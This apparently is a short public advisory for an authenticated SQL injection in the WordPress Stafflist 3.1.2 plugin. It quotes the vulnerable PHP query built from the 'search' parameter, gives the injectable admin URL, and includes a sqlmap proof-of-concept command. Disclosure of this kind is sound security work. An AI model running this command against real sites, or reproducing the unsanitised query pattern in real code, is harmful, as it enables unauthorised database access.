Headline
WordPress Stafflist 3.1.2 SQL Injection
WordPress Stafflist plugin version 3.1.2 suffers from a remote SQL injection vulnerability.
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection(Authenticated)# Date: 05-02-2022# Exploit Author: Hassan Khan Yusufzai - Splint3r7# Vendor Homepage: https://wordpress.org/plugins/stafflist/# Version: 3.1.2# Tested on: Firefox# Contact me: h [at] spidersilk.com# Vulnerable Code:$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?... $where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR LOWER(firstname) LIKE '%{$w}%' OR LOWER(department) LIKE '%{$w}%' OR LOWER(email) LIKE '%{$w}%'" : "");# Vulnerable URLhttp://localhost:10003/wp-admin/admin.php?page=stafflist&search=[SQLI]# POC```sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'--cookie="wordpress_cookies_paste_here"```# POC Imagehttps://prnt.sc/AECcFRHhe2ib